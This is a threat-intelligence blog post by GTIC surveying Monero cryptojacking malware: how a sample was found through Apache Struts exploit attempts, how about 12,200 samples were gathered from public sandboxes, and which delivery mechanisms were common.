As cryptocurrency investing becomes the new fad, threat actors, as usual, have developed malware to get in on the action. In April 2017, the Global Threat Intelligence Center (GTIC) came across a Monero (XMR) mining malware sample. As we continued to discover more and more of these samples, we decided to research and trend these miners in an attempt to map the threat landscape and associated risk. This report provides details into the different angles used to hunt down XMR mining malware and also provides a basic overview of campaigns analyzed during our research efforts.
Brief overview into blockchain and cryptocurrency
Before diving into coin mining malware and associated tactics, techniques, and procedures (TTPs), it is important to have a simple understanding of the technology at play. Coin miners are programs which leverage victim resources to mine cryptocurrency by solving mathematical puzzles. Cryptocurrency, a legitimate form of digital currency, operates using blockchain technology. In short, blockchain technology is a digital ledger which records and confirms transactions between parties. These recorded transactions can be thought of as “blocks” which obtain a timestamp for the transaction and use cryptography for security. A blockchain is typically made public on a peer-to-peer (P2P) network, allowing those involved to verify the integrity of the transactions, ultimately establishing a trust relationship. In 2017 alone, the value in several cryptocurrencies saw 1,000-5000% increases!
Monero (XMR), is a preferred cryptocurrency mined by threat actors. Preference stems from the increased security and anonymity XMR provides, which includes prevention of fund tracking, encrypted user addresses, convoluted tracking of transactions, and more.
Defining the coinminer variant
As researchers, we often recognize the terms, banking trojan, ransomware, worm, spyware, etc. In 2017, it was important to identify the correct language for depicting what coin mining malware was, leading the GTIC to quote:
“Coin mining malware is any software, code, or script unknowingly used by a user or machine to mine cryptocurrency for another party.” – GTIC
Often times, you may come across the term “cryptojacking” which is identical in terms of definition and meaning.
Our first introduction to a coin mining malware
As stated, in April 2017, GTIC was analyzing active exploit attempts against CVE-2017-5638 (Apache Struts), which led us to our first coin miner sample. In the HTTP request containing the exploit to the targeted server, threat actors attempted to run arbitrary commands to download the first stage of malware. Analysis determined this was a simple shellscript designed to kill off any previous infection before downloading the final malware, along with a configuration file. Upon execution of the binary, the configuration file, which contained JSON data, was used to indicate which mining pool to use. Included also was the user address, password and algorithm for mining, which in this case was cryptonight.
Analysis indicated this malware to be a ‘cpuminer’ variant, which is a coin miner publicly available on Github. Several other analysis’ later and GTIC became this was the standard for cryptojacking campaigns. Please refer to the GTIC Monero Mining Malware Report for more breakdowns of our findings while hunting cryptojacking campaigns and IoCs.
Leveraging public sandboxes for data
Based on several analysis’ campaigns, it was evident coin miners leverage a mining pool at some point of the infection. Not all coin miners use the same mining pool however, as the mining pool is dependent on the cryptocurrency being mined. Mining pools share their processing power over the network when mining, splitting the reward. Leveraging VirusTotal and Hybrid-Analysis, GTIC researchers wrote a simple script, and used a simple YARA signature to pull all samples which communicated with at least 1 of the 37 domains listed as XMR mining pools by supportxmr.com
Data pulls allowed researchers to gather ~12,200 samples, dating back to 2014, with the most popular being PEs. More insight can be found in the GTIC Monero Mining Malware Report as well as IoCs.
Identifying delivery mechanisms
As we continued our analysis, it was important to identify the delivery mechanism threat actors were using. Out of all cases analyzed, manual downloads via arbitrary commands after exploiting a vulnerability which allowed remote code execution (RCE) was the most popular. The GTIC is continuing to analyze WebLogic exploits which lead to coin miners. Threat actors mainly targeted JBoss, Apache Struts, WebLogic and IIS vulnerabilities. Phishing was the second-most popular followed by SSH and RDP brute-forcing and even URI command injection. A more detailed list of specific vulnerabilities can be found in the GTIC Monero Mining Malware Report.
Maliciously used coin miners and cryptojacking, at the time of this writing, are both very popular and are only expected to increase throughout 2018. With popularity being drawn to cryptocurrency investing and mining, value will continue to fluctuate. Threat actors, whose motivation may be monetary gains, will continue to use coin miners in their operations to produce funds while remaining anonymous. Our analysis shows both opportunistic and more advanced coin mining operations, with some researchers some being attributed to advance persistent threat (APT) groups. TTPs used will only continue to become more advanced, increasing detection difficulty. The GTIC recommends reviewing the GTIC Monero Mining Malware Report which gives more insight into our analysis and findings about malicious coin mining, as well as the approaches we took to hunting and gathering the data.